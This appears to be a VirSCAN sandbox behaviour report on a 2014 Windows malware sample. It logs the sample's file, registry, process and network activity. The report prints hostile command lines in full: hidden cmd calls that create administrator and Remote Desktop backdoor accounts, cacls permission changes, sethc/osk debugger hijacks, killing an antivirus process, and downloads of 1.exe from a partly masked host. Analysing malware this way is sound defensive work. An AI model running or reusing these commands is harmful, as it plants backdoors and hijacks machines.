VirSCAN VirSCAN

1, You can UPLOAD any files, but there is 20Mb limit per file.
2, VirSCAN supports Rar/Zip decompression, but it must be less than 20 files.
3, Aplikace VirSCAN může skenovat komprimované soubory s heslem 'infected'nebo'virus'.
4, If your browser cannot upload files, please download VirSCAN uploader to upload.

Language
Server load
Server Load

VirSCAN
VirSCAN

1, You can UPLOAD any files, but there is 20Mb limit per file.
2, VirSCAN supports Rar/Zip decompression, but it must be less than 20 files.
3, Aplikace VirSCAN může skenovat komprimované soubory s heslem 'infected'nebo'virus'.

   File information

Virscan.org multi-engine scan report
Behavior analysis report:         Habo file analysis

Basic Information

MD5:5ed33d0581eb5573f314944d600cdc24
文件大小:5.58MB
上传时间: 2014-09-22 10:36:30 (CST)
Package names:
Minimum operating environment:
copyright:

Key behavior

Behavior description: 修改注册表_IE首页
details: \REGISTRY\USER\S-*\Software\Microsoft\Internet Explorer\Main\Start Page
Behavior description: 探测 Virtual PC是否存在
details: N/A
Behavior description: 设置特殊文件夹属性
details: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
Behavior description: 修改注册表_镜像劫持
details: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OSK.EXE\Debugger
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe\Debugger
Behavior description: 添加管理员权限
details: ImagePath = , CmdLine = cmd /c net user txj888.com0 398358887 /add & net localgroup administrators txj888.com0 /add & net user txj888.com0 /active:yes & net user txj888.com1 398358887 /add & net localgroup administrators txj888.com1 /add & net user txj888.com
ImagePath = , CmdLine = cmd /c net user txj888.com0 398358887 /add & net localgroup administrators txj888.com0 /add & net user txj888.com0 /active:yes & net localgroup "Remote Desktop Users" txj888.com0 /add & net user txj888.com1 398358887 /add & net localgr
Behavior description: 对比可疑进程名
details: stricmp: [System Process] <------> avp.exe Des: 卡巴斯基
lstrcmpiA: System <------> avp.exe Des: 卡巴斯基
lstrcmpiA: smss.exe <------> avp.exe Des: 卡巴斯基
lstrcmpiA: csrss.exe <------> avp.exe Des: 卡巴斯基
lstrcmpiA: winlogon.exe <------> avp.exe Des: 卡巴斯基
lstrcmpiA: services.exe <------> avp.exe Des: 卡巴斯基
lstrcmpiA: lsass.exe <------> avp.exe Des: 卡巴斯基
lstrcmpiA: QFcxService.exe <------> avp.exe Des: 卡巴斯基
lstrcmpiA: wwocthlp.exe <------> avp.exe Des: 卡巴斯基
lstrcmpiA: svchost.exe <------> avp.exe Des: 卡巴斯基
lstrcmpiA: spoolsv.exe <------> avp.exe Des: 卡巴斯基
lstrcmpiA: jqs.exe <------> avp.exe Des: 卡巴斯基
lstrcmpiA: QQCpgradeHelper.exe <------> avp.exe Des: 卡巴斯基
lstrcmpiA: alg.exe <------> avp.exe Des: 卡巴斯基
lstrcmpiA: explorer.exe <------> avp.exe Des: 卡巴斯基
Behavior description: 修改注册表_禁用注册表编辑器项
details: \REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools
Behavior description: 杀掉进程
details: TASKKILL = taskkill /f /im KSafeTray.exe
C:\WINDOWS\system32\ksafetray.exe
Behavior description: 修改注册表_禁用修改IE首页属性
details: \REGISTRY\USER\S-*\Software\Policies\Microsoft\Internet Explorer\control Panel\HomePage
Behavior description: 尝试打开调试器或监控软件的驱动设备对象
details: \??\SICE
\??\NTICE
\??\SIWVID
Behavior description: 获取TickCount值
details: TickCount = 283406, SleepMilliseconds = 60000.
TickCount = 283453, SleepMilliseconds = 60000.
TickCount = 223600, SleepMilliseconds = 100.
TickCount = 223615, SleepMilliseconds = 100.
TickCount = 223631, SleepMilliseconds = 100.
TickCount = 223662, SleepMilliseconds = 100.
TickCount = 223678, SleepMilliseconds = 100.
TickCount = 223693, SleepMilliseconds = 100.
TickCount = 223771, SleepMilliseconds = 100.
TickCount = 223787, SleepMilliseconds = 100.
TickCount = 223818, SleepMilliseconds = 100.
TickCount = 283718, SleepMilliseconds = 60000.
TickCount = 283734, SleepMilliseconds = 60000.
TickCount = 283765, SleepMilliseconds = 60000.
TickCount = 283812, SleepMilliseconds = 60000.
Behavior description: 设置启动项
details: C:\Documents and Settings\All Users\「开始」菜单\程序\启动\svchostaao.exe
Behavior description: 修改注册表_禁用CMD 相关属性
details: \REGISTRY\USER\S-*\Software\Policies\Microsoft\Windows\System\DisableCMD
Behavior description: 修改注册表_启动项
details: \REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Run\
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\86F252CD
Behavior description: 直接获取CPU时钟
details: EAX = 0xb897f208, EDX = 0x000000b6
EAX = 0xb897f254, EDX = 0x000000b6
EAX = 0xb897f2a0, EDX = 0x000000b6
EAX = 0xb897f2ec, EDX = 0x000000b6
EAX = 0xefed6290, EDX = 0x000000b6
EAX = 0xefed62dc, EDX = 0x000000b6
EAX = 0xa3556a16, EDX = 0x000000bc
EAX = 0xa3556a62, EDX = 0x000000bc
EAX = 0xa3556aae, EDX = 0x000000bc
EAX = 0xa3556afa, EDX = 0x000000bc
EAX = 0xab1808f0, EDX = 0x000000bc
EAX = 0xab18093c, EDX = 0x000000bc
EAX = 0xb07e07e8, EDX = 0x000000bc
EAX = 0xb07e0834, EDX = 0x000000bc
EAX = 0x530aa170, EDX = 0x000000c8
Behavior description: 创建系统服务
details: [服务创建成功]: FIETXBEH, C:\WINDOWS\system32\drivers\FIETXBEH.sys
Behavior description: VMWare特殊指令检测虚拟机
details: N/A

Process behavior

Behavior description: 隐藏窗口创建进程
details: ImagePath = , CmdLine = cmd /c cd c:\windows\system32 & regini regini.ini
ImagePath = , CmdLine = taskkill /f /im KSafeTray.exe
ImagePath = , CmdLine = net start "Task Scheduler"
ImagePath = , CmdLine = cmd /c cacls c:\windows\system32\net.exe /e /t /g everyone:c
ImagePath = , CmdLine = cmd /c cacls c:\windows\system32\net1.exe /e /t /g everyone:c
ImagePath = , CmdLine = cmd /c cacls c:\windows\system32\cmd.exe /e /t /g everyone:c
ImagePath = , CmdLine = cmd /c cacls c:\windows\system32\sethc.exe /e /t /g everyone:c
ImagePath = , CmdLine = cmd /c net user txj888.com0 /active:yes & & net user txj888.com1 /active:yes & net user txj888.com2 /active:yes &
ImagePath = , CmdLine = cmd /c net user txj888.com0 398358887 /add & net localgroup administrators txj888.com0 /add & net user txj888.com0 /active:yes & net user txj888.com1 398358887 /add & net localgroup administrators txj888.com1 /add & net user txj888.com1 /active:yes & net user
ImagePath = , CmdLine = cmd /c net user txj888.com0 398358887 /add & net localgroup administrators txj888.com0 /add & net user txj888.com0 /active:yes & net localgroup "Remote Desktop Users" txj888.com0 /add & net user txj888.com1 398358887 /add & net localgroup administrators txj88
ImagePath = , CmdLine = cmd /c echo y|cacls c:\windows\system32\mmc.exe /e /c /d everyone
ImagePath = C:\WINDOWS\kk/svchost.exe, CmdLine = "C:\WINDOWS\kk/svchost.exe"
ImagePath = C:\WINDOWS\tt/svchost.exe, CmdLine = "C:\WINDOWS\tt/svchost.exe"
ImagePath = C:\WINDOWS\bb/svchost.exe, CmdLine = "C:\WINDOWS\bb/svchost.exe"
Behavior description: 创建进程
details: [0x00000bd4]ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = cmd /c cd c:\windows\system32 & regini regini.ini
[0x00000c0c]ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = cmd /c cd c:\windows\system32 & regini regini.ini
[0x00000c20]ImagePath = C:\WINDOWS\system32\regini.exe, CmdLine = regini regini.ini
[0x00000c1c]ImagePath = C:\WINDOWS\system32\regini.exe, CmdLine = regini regini.ini
[0x00000c2c]ImagePath = C:\WINDOWS\system32\taskkill.exe, CmdLine = taskkill /f /im KSafeTray.exe
[0x00000c40]ImagePath = C:\WINDOWS\system32\net.exe, CmdLine = net start "Task Scheduler"
[0x00000c84]ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = cmd /c cd c:\windows\system32 & regini regini.ini
[0x00000c8c]ImagePath = C:\WINDOWS\system32\net1.exe, CmdLine = net1 start "Task Scheduler"
[0x00000cbc]ImagePath = C:\WINDOWS\system32\regini.exe, CmdLine = regini regini.ini
[0x00000cf0]ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = cmd /c cd c:\windows\system32 & regini regini.ini
[0x00000d18]ImagePath = C:\WINDOWS\system32\regini.exe, CmdLine = regini regini.ini
[0x00000d28]ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = cmd /c cd c:\windows\system32 & regini regini.ini
[0x00000d30]ImagePath = C:\WINDOWS\system32\regini.exe, CmdLine = regini regini.ini
[0x00000d68]ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = cmd /c cd c:\windows\system32 & regini regini.ini
[0x00000d88]ImagePath = C:\WINDOWS\system32\regini.exe, CmdLine = regini regini.ini
Behavior description: 创建本地线程
details: TargetProcess: %temp%\****.exe, InheritedFromPID = 2000, ProcessID = 2612, ThreadID = 2748, StartAddress = 77DC845A, Parameter = 00000000
TargetProcess: %temp%\****.exe, InheritedFromPID = 2000, ProcessID = 2612, ThreadID = 2752, StartAddress = 7C947EBB, Parameter = 00000000
TargetProcess: %temp%\****.exe, InheritedFromPID = 2000, ProcessID = 2612, ThreadID = 2756, StartAddress = 7C930230, Parameter = 00000000
TargetProcess: %temp%\****.exe, InheritedFromPID = 2000, ProcessID = 2612, ThreadID = 2784, StartAddress = 77E56C7D, Parameter = 001D8FF0
TargetProcess: %temp%\****.exe, InheritedFromPID = 2000, ProcessID = 2612, ThreadID = 2788, StartAddress = 769AE43B, Parameter = 001DF6C0
TargetProcess: %temp%\****.exe, InheritedFromPID = 2000, ProcessID = 2612, ThreadID = 2792, StartAddress = 024E507F, Parameter = 00129758
TargetProcess: %temp%\****.exe, InheritedFromPID = 2000, ProcessID = 2612, ThreadID = 2796, StartAddress = 6359727B, Parameter = 03E84240
TargetProcess: %temp%\****.exe, InheritedFromPID = 2000, ProcessID = 2612, ThreadID = 2816, StartAddress = 6359727B, Parameter = 03EC42E0
TargetProcess: %temp%\****.exe, InheritedFromPID = 2000, ProcessID = 2612, ThreadID = 2820, StartAddress = 6359727B, Parameter = 03EC4380
TargetProcess: servero.exe, InheritedFromPID = 2612, ProcessID = 2896, ThreadID = 2936, StartAddress = 77DC845A, Parameter = 00000000
TargetProcess: servero.exe, InheritedFromPID = 2612, ProcessID = 2896, ThreadID = 3124, StartAddress = 10002200, Parameter = 00000000
TargetProcess: servero.exe, InheritedFromPID = 2612, ProcessID = 2896, ThreadID = 3128, StartAddress = 10002940, Parameter = 00000000
TargetProcess: servero.exe, InheritedFromPID = 2612, ProcessID = 2896, ThreadID = 3132, StartAddress = 77C0A341, Parameter = 003F4AA0
TargetProcess: servero.exe, InheritedFromPID = 2612, ProcessID = 2896, ThreadID = 3144, StartAddress = 77C0A341, Parameter = 003F4AA0
TargetProcess: servero.exe, InheritedFromPID = 2612, ProcessID = 2896, ThreadID = 3148, StartAddress = 77C0A341, Parameter = 003F4CD0
Behavior description: 创建下载文件进程
details: [0x00000f08]ImagePath = C:\WINDOWS\kk\svchost.exe, CmdLine = "C:\WINDOWS\kk/svchost.exe"
[0x00000f20]ImagePath = C:\WINDOWS\tt\svchost.exe, CmdLine = "C:\WINDOWS\tt/svchost.exe"
[0x00000f58]ImagePath = C:\WINDOWS\bb\svchost.exe, CmdLine = "C:\WINDOWS\bb/svchost.exe"
[0x00000f68]ImagePath = C:\WINDOWS\bb\svchost.exe, CmdLine = "C:\WINDOWS\bb/svchost.exe"
Behavior description: 杀掉进程
details: TASKKILL = taskkill /f /im KSafeTray.exe
C:\WINDOWS\system32\ksafetray.exe
Behavior description: 创建新文件进程
details: [0x00000b2c]ImagePath = C:\WINDOWS\system32\svchdsort.exe, CmdLine = C:\WINDOWS\system32\svchdsort.exe
[0x00000b40]ImagePath = C:\WINDOWS\system32\svchostrr.exe, CmdLine = C:\WINDOWS\system32\svchostrr.exe
[0x00000b50]ImagePath = C:\WINDOWS\Registration\CRMLog\servero.exe, CmdLine = C:\WINDOWS\Registration\CRMLog\servero.exe
[0x00000d4c]ImagePath = C:\WINDOWS\system32\svkkk.exe, CmdLine = C:\WINDOWS\system32\svkkk.exe
Behavior description: 枚举进程
details: N/A

File behavior

Behavior description: 创建文件
details: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\2345_com[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\navcancl[2]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\ErrorPageTemplate[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6TLOMATB\errorPageStrings[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\httpErrorPagesScripts[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6TLOMATB\background_gradient[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\info_48[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6TLOMATB\bullet[1]
C:\WINDOWS\system32\drivers\FIETXBEH.sys
C:\WINDOWS\system32\svchdsort.exe
C:\WINDOWS\system32\svchostrr.exe
C:\WINDOWS\Registration\CRMLog\servero.exe
C:\WINDOWS\system32\regini.ini
C:\WINDOWS\86F252CD\svchsot.exe
C:\WINDOWS\system32\svkkk.exe
Behavior description: 创建可执行文件
details: C:\WINDOWS\system32\svchdsort.exe
C:\WINDOWS\system32\svchostrr.exe
C:\WINDOWS\Registration\CRMLog\servero.exe
C:\WINDOWS\86F252CD\svchsot.exe
C:\WINDOWS\system32\svkkk.exe
C:\WINDOWS\SoftwareDistribution\DataStore\Logs\svhoss.exe
C:\WINDOWS\security\Database\ko.exe
C:\WINDOWS\kk\svchost.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\svchostaao.exe
C:\WINDOWS\tt\svchost.exe
C:\WINDOWS\system32\svchostaao.exe
C:\WINDOWS\bb\svchost.exe
Behavior description: 修改脚本文件
details: C:\WINDOWS\security\Database\kk.bat ---> Offset = 0
Behavior description: 覆盖已有文件
details: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\navcancl[2]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\ErrorPageTemplate[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6TLOMATB\errorPageStrings[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\httpErrorPagesScripts[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6TLOMATB\background_gradient[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\info_48[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6TLOMATB\bullet[1]
C:\WINDOWS\system32\regini.ini
C:\WINDOWS\SoftwareDistribution\DataStore\Logs\svhoss.exe
C:\WINDOWS\security\Database\kk.bat
C:\WINDOWS\security\Database\ko.exe
Behavior description: 查找文件
details: FileName = C:\Documents and Settings\Administrator\Local Settings\%temp%\aspr_keys.ini
FileName = C:\Documents and Settings
FileName = C:\Documents and Settings\Administrator
FileName = C:\Documents and Settings\Administrator\Local Settings
FileName = C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Connections\Pbk\*.pbk
FileName = C:\WINDOWS\system32\Ras\*.pbk
FileName = C:\Documents and Settings\Administrator\Application Data\Microsoft\Network\Connections\Pbk\*.pbk
FileName = C:\WINDOWS
FileName = C:\WINDOWS\system32
FileName = C:\WINDOWS\system32\urlmon.dll
FileName = C:\WINDOWS\system32\ieframe.dll
FileName = C:\WINDOWS\system32\drivers\FIETXBEH.sys
FileName = C:\WINDOWS\Registration\CRMLog
FileName = C:\WINDOWS\Registration\CRMLog\servero.exe
FileName = C:\WINDOWS\system32\aspr_keys.ini
Behavior description: 设置启动项
details: C:\Documents and Settings\All Users\「开始」菜单\程序\启动\svchostaao.exe
Behavior description: 删除文件
details: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\2345_com[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\navcancl[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6TLOMATB\ErrorPageTemplate[2]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\errorPageStrings[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6TLOMATB\httpErrorPagesScripts[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\background_gradient[3]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6TLOMATB\info_48[2]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IUKHR8T2\bullet[2]
C:\WINDOWS\system32\drivers\FIETXBEH.sys
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\1[1].exe
Behavior description: 复制文件
details: C:\WINDOWS\Registration\CRMLog\servero.exe ---> C:\WINDOWS\86F252CD\svchsot.exe
C:\Documents and Settings\Administrator\Local Settings\%temp%/%temp%\****.exe ---> C:\Documents and Settings\All Users\「开始」菜单\程序\启动\svchostaao.exe
C:\Documents and Settings\Administrator\Local Settings\%temp%/%temp%\****.exe ---> C:\WINDOWS\system32\svchostaao.exe
Behavior description: 设置特殊文件夹属性
details: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
Behavior description: 修改文件内容
details: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\navcancl[2] ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\ErrorPageTemplate[1] ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6TLOMATB\errorPageStrings[1] ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\httpErrorPagesScripts[1] ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6TLOMATB\background_gradient[1] ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\info_48[1] ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6TLOMATB\bullet[1] ---> Offset = 0
C:\WINDOWS\system32\drivers\FIETXBEH.sys ---> Offset = 0
C:\WINDOWS\system32\svchdsort.exe ---> Offset = 0
C:\WINDOWS\system32\svchostrr.exe ---> Offset = 0
C:\WINDOWS\Registration\CRMLog\servero.exe ---> Offset = 0
C:\WINDOWS\system32\regini.ini ---> Offset = 0
C:\WINDOWS\86F252CD\svchsot.exe ---> Offset = 0
C:\WINDOWS\86F252CD\svchsot.exe ---> Offset = 65536
C:\WINDOWS\86F252CD\svchsot.exe ---> Offset = 4096

Network behavior

Behavior description: 下载文件
details: URLDownloadToFileW: http://ww****om:2011/1.exe ---> C:\WINDOWS\kk/svchost.exe
C:\WINDOWS\kk\svchost.exe
URLDownloadToFileW: http://ww****om:2011/1.exe ---> C:\WINDOWS\tt/svchost.exe
C:\WINDOWS\tt\svchost.exe
URLDownloadToFileW: http://ww****om:2011/1.exe ---> C:\WINDOWS\bb/svchost.exe
C:\WINDOWS\bb\svchost.exe
URLDownloadToFileW: http://**.133.40.**:2011/1.exe ---> C:\WINDOWS\bb/svchost.exe
Behavior description: 连接指定站点
details: InternetConnectA: ServerName = ww****om, PORT = 80, UserName = , Password = , hSession = 0x00cc0004, hConnect = 0x00cc0008, Flags = 0x00000000
InternetConnectA: ServerName = ww****om, PORT = 2011, UserName = , Password = , hSession = 0x00cc0004, hConnect = 0x00cc0008, Flags = 0x00000000
InternetConnectA: ServerName = **.133.40.**, PORT = 2011, UserName = , Password = , hSession = 0x00cc0004, hConnect = 0x00cc0008, Flags = 0x00000000
Behavior description: 打开HTTP连接
details: InternetOpenA: UserAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489), hSession = 0x00cc0004
Behavior description: 建立到一个指定的套接字连接
details: URL: ww****om, IP: **.133.40.**:80, SOCKET = 0x00000348
URL: ww****om, IP: **.133.40.**:80, SOCKET = 0x000003f8
URL: qw****et, IP: **.133.40.**:2013, SOCKET = 0x00000168
URL: ww****om, IP: **.133.40.**:2011, SOCKET = 0x000002fc
URL: ww****om, IP: **.133.40.**:2011, SOCKET = 0x00000300
URL: ww****om, IP: **.133.40.**:2011, SOCKET = 0x00000358
URL: ww****om, IP: **.133.40.**:2011, SOCKET = 0x0000036c
Behavior description: 读取网络文件
details: hFile = 0x00cc000c, BytesToRead =4096, BytesRead = 4096.
hFile = 0x00cc000c, BytesToRead =2048, BytesRead = 2048.
Behavior description: 发送HTTP包
details: GET /?k61539783 HTTP/1.1 Accept: */* Accept-Language: zh-cn Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: ww****om Connection: Keep-Alive
GET /1.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: ww****om:2011 Connection: Keep-Alive
GET /1.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: **.133.40.**:2011 Connection: Keep-Alive
Behavior description: 打开HTTP请求
details: HttpOpenRequestA: ww****om:80/?k61539783, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400200
HttpOpenRequestA: ww****om:80/?k61539783, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010
HttpOpenRequestA: ww****om:2011/1.exe, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010
HttpOpenRequestA: **.133.40.**:2011/1.exe, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010
Behavior description: 按名称获取主机地址
details: GetAddrInfoW: ww****om
gethostbyname: qw****et
gethostbyname: ww****om

Registry behavior

Behavior description: 修改注册表_服务项
details: \REGISTRY\MACHINE\SYSTEM\ControlSet002\Services\FIETXBEH\ImagePath
\REGISTRY\MACHINE\SYSTEM\ControlSet002\Services\FIETXBEH\Start
Behavior description: 修改注册表_镜像劫持
details: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OSK.EXE\Debugger
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe\Debugger
Behavior description: 修改注册表_禁用修改IE首页属性
details: \REGISTRY\USER\S-*\Software\Policies\Microsoft\Internet Explorer\control Panel\HomePage
Behavior description: 修改注册表
details: \REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
\REGISTRY\MACHINE\SYSTEM\ControlSet002\Services\FIETXBEH\DisplayName
\REGISTRY\MACHINE\SYSTEM\ControlSet002\Services\FIETXBEH\ErrorControl
\REGISTRY\MACHINE\SYSTEM\ControlSet002\Services\FIETXBEH\Type
\REGISTRY\MACHINE\SYSTEM\ControlSet002\Services\FIETXBEH\Security\Security
\REGISTRY\MACHINE\SYSTEM\ControlSet002\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber
\REGISTRY\MACHINE\SYSTEM\ControlSet002\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber
\REGISTRY\MACHINE\SYSTEM\InfoTime\InfoTime
\REGISTRY\USER\S-*\Software\Microsoft\Internet Explorer\Mainy\Start Page
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\
\REGISTRY\MACHINE\SYSTEM\ControlSet002\Control\Terminal Server\fDenyTSConnections
\REGISTRY\USER\S-*\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\WINDOWS\kk/svchost.exe
\REGISTRY\USER\S-*\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\WINDOWS\tt/svchost.exe
\REGISTRY\USER\S-*\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\WINDOWS\bb/svchost.exe
Behavior description: 修改注册表_禁用CMD 相关属性
details: \REGISTRY\USER\S-*\Software\Policies\Microsoft\Windows\System\DisableCMD
Behavior description: 删除注册表键值
details: \REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
Behavior description: 修改注册表_IE首页
details: \REGISTRY\USER\S-*\Software\Microsoft\Internet Explorer\Main\Start Page
Behavior description: 修改注册表_禁用注册表编辑器项
details: \REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools
Behavior description: 修改注册表_启动项
details: \REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Run\
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\86F252CD

Other behavior

Behavior description: 检测自身是否被调试
details: IsDebuggerPresent
Behavior description: 隐藏指定窗口
details: [Window,Class] = [,Afx:400000:8:10011:1900015:0]
[Window,Class] = [,SysLink]
[Window,Class] = [,Static]
[Window,Class] = [文件大小未知,Static]
[Window,Class] = [打开此类文件前总是询问(&W),Button]
[Window,Class] = [发行者:,Static]
[Window,Class] = [,Afx:400000:b:10011:1900015:0]
[Window,Class] = [获取账户信息,Button]
[Window,Class] = [全选,Button]
[Window,Class] = [删除选中账户,Button]
Behavior description: 添加管理员权限
details: ImagePath = , CmdLine = cmd /c net user txj888.com0 398358887 /add & net localgroup administrators txj888.com0 /add & net user txj888.com0 /active:yes & net user txj888.com1 398358887 /add & net localgroup administrators txj888.com1 /add & net user txj888.com
ImagePath = , CmdLine = cmd /c net user txj888.com0 398358887 /add & net localgroup administrators txj888.com0 /add & net user txj888.com0 /active:yes & net localgroup "Remote Desktop Users" txj888.com0 /add & net user txj888.com1 398358887 /add & net localgr
Behavior description: 启动系统服务
details: [服务已运行]: LocalSystem, Task Scheduler, C:\WINDOWS\System32\svchost.exe -k netsvcs
Behavior description: 获取光标位置
details: CursorPos = (80,18468), SleepMilliseconds = 60000.
CursorPos = (6373,26501), SleepMilliseconds = 60000.
CursorPos = (19208,15725), SleepMilliseconds = 60000.
Behavior description: 可执行文件签名信息
details: C:\WINDOWS\system32\svchdsort.exe(签名验证: 未通过)
C:\WINDOWS\system32\svchostrr.exe(签名验证: 未通过)
C:\WINDOWS\Registration\CRMLog\servero.exe(签名验证: 未通过)
C:\WINDOWS\86F252CD\svchsot.exe(签名验证: 未通过)
C:\WINDOWS\system32\svkkk.exe(签名验证: 未通过)
C:\WINDOWS\SoftwareDistribution\DataStore\Logs\svhoss.exe(签名验证: 未通过)
C:\WINDOWS\security\Database\ko.exe(签名验证: 未通过)
C:\WINDOWS\kk\svchost.exe(签名验证: 未通过)
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\svchostaao.exe(签名验证: 未通过)
C:\WINDOWS\tt\svchost.exe(签名验证: 未通过)
C:\WINDOWS\system32\svchostaao.exe(签名验证: 未通过)
C:\WINDOWS\bb\svchost.exe(签名验证: 未通过)
Behavior description: VMWare特殊指令检测虚拟机
details: N/A
Behavior description: 可执行文件MD5
details: C:\WINDOWS\system32\svchdsort.exe ---> a1c602939ab3d8f7a6b68e7372656a00
